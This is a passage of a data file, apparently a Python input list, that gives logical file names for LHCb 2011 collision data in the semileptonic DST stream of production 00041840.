'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055944_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045933_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019441_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025895_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055820_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058603_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041177_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056677_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059523_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059930_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002197_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028744_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018573_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022989_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062551_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037135_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028864_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044775_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038234_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046904_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024482_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040858_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021072_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044653_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027688_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042428_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054063_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065438_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016555_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056457_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033492_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056153_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067898_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011698_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057707_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069360_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033976_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001660_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003382_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010460_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034111_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053628_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007913_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026215_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029612_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032242_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065983_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046789_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051023_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032594_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044984_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012363_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067813_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043643_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014706_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062923_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023887_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003350_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068466_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068990_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021026_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021249_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007699_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054198_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022128_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036501_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058577_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042936_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068793_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033101_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056725_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045036_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057721_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063007_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006947_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006274_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012429_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039362_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062300_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040614_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051314_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068941_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065266_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022855_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009935_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020605_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054094_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005655_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060053_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036057_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048954_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039363_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013076_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015439_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023216_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059406_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066279_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068670_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055771_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057498_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026818_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042268_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062257_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042426_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023474_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028388_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034630_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064467_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004532_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031794_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042775_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062942_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029906_1.semileptonic.dst',
